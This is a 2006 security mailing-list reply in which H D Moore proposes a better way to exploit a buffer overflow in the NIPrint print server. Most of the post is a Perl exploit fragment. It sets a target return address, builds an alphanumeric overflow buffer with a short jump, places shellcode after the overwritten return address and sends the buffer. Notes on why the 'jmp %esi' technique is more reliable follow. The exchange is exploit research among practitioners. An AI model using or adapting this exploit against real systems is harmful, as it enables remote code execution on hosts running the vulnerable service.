Dailydave mailing list archives
Re: VisualSploit redux
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Tue, 23 May 2006 17:35:38 -0500
On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> Anyways, there's a movie here: http://www.immunitysec.com/documentation/vs_niprint.html
Not to nitpick, but there is a better way to exploit this bug:

    'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],

    # 8192 bytes of alphanumeric filler
    my $req = Pex::Text::AlphaNumText(8192);
    # short jump (0x33 bytes forward) at the start of the string; lands at offset 53
    substr($req, 0, 2, "\xeb\x33");
    # 4-byte little-endian return address at offset 49
    substr($req, 49, 4, pack('V', $target->[1]));
    # payload placed right after the return address
    substr($req, 53, length($shellcode), $shellcode);
    $s->Send($req);

This will return to a "jmp %esi", where %esi points to the source string before the memory overwrite. The benefits of this vs. the "jmp %esp":

* Our code isn't running so close to ESP (easy to fix w/prepend)
* More room for the actual payload (could even embed the ret)
* The return address will work regardless of OS/SP combo

Fun stuff, keep up the demos :-)

-HD